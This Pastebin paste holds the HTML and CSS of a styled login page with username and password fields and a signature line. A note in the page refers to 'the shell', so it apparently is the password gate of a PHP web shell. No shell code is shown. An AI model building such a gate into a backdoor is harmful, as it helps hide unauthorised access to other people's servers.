Advertisement
thuechen

Log in

Apr 17th, 2015
497
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.18 KB | None | 0 0
  1.  
  2. <style type="text/css">
  3. <!--
  4.  
  5. body,td,th {
  6. color: #FF0000;
  7. font-size: 14px;
  8. }
  9. input.but {
  10. background-color:#000000;
  11. color:#FF0000;
  12. border : 1px solid #1B1B1B;
  13. }
  14. a:link {
  15. color: #00FF00;
  16. text-decoration:none;
  17. font-weight:500;
  18. }
  19. a:hover {
  20. color:#00FF00;
  21. text-decoration:underline;
  22. }
  23. font.txt
  24. {
  25. color: #00FF00;
  26. text-decoration:none;
  27. font-size:14px;
  28. }
  29. font.mainmenu
  30. {
  31. color:#FF0000;
  32. text-decoration:none;
  33. font-size:14px;
  34. }
  35. a:visited {
  36. color: #006600;
  37. }
  38. input.box
  39. {
  40. background-color:#0C0C0C;
  41. color: lime;
  42. border : 1px solid #1B1B1B;
  43. -moz-border-radius:6px;
  44. width:400;
  45. border-radius:6px;
  46. }
  47. input.sbox
  48. {
  49. background-color:#0C0C0C;
  50. color: lime;
  51. border : 1px solid #1B1B1B;
  52. -moz-border-radius:6px;
  53. width:180;
  54. border-radius:6px;
  55. }
  56. select.sbox
  57. {
  58. background-color:#0C0C0C;
  59. color: lime;
  60. border : 1px solid #1B1B1B;
  61. -moz-border-radius:6px;
  62. width:180;
  63. border-radius:6px;
  64. }
  65. select.box
  66. {
  67. background-color:#0C0C0C;
  68. color: lime;
  69. border : 1px solid #1B1B1B;
  70. -moz-border-radius:6px;
  71. width:400;
  72. border-radius:6px;
  73. }
  74.  
  75. textarea.box
  76. {
  77. border : 3px solid #111;
  78. background-color:#161616;
  79. color : lime;
  80. margin-top: 10px;
  81. -moz-border-radius:7px;
  82. border-radius:7px;
  83. }
  84. body {
  85. background-color:#000000;
  86. }
  87. .myphp table
  88. {
  89. width:100%;
  90. padding:18px 10px;
  91. border : 1px solid #1B1B1B;
  92. }
  93. .myphp td
  94. {
  95. background:#111111;
  96. color:#00ff00;
  97. padding:6px 8px;
  98. border-bottom:1px solid #222222;
  99. font-size:14px;
  100. }
  101. .myphp th, th
  102. {
  103. background:#181818;
  104.  
  105. }
  106. -->
  107. </style> <center>
  108. <form method="POST">
  109. <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
  110. <table cellpadding="9" cellspacing="4">
  111. <tr>
  112. <td align="center" colspan="2"><blink><font size="7"><b>My Site</b></font></blink></td>
  113. </tr>
  114. <tr>
  115. <td align="right"><b>User Name : </b></td>
  116. <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
  117. </tr>
  118. <tr>
  119. <td align="right"><b>Password : </b></td>
  120. <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
  121. </tr>
  122. <tr>
  123. <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
  124. </tr>
  125. <tr>
  126. <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Richard Enage==--</b></font></td>
  127. </tr>
  128. <tr>
  129. <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
  130. </tr>
  131. </table>
  132. </div>
  133.  
  134. </form>
  135. </center>
  136. <br>
  137. </body>
  138. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement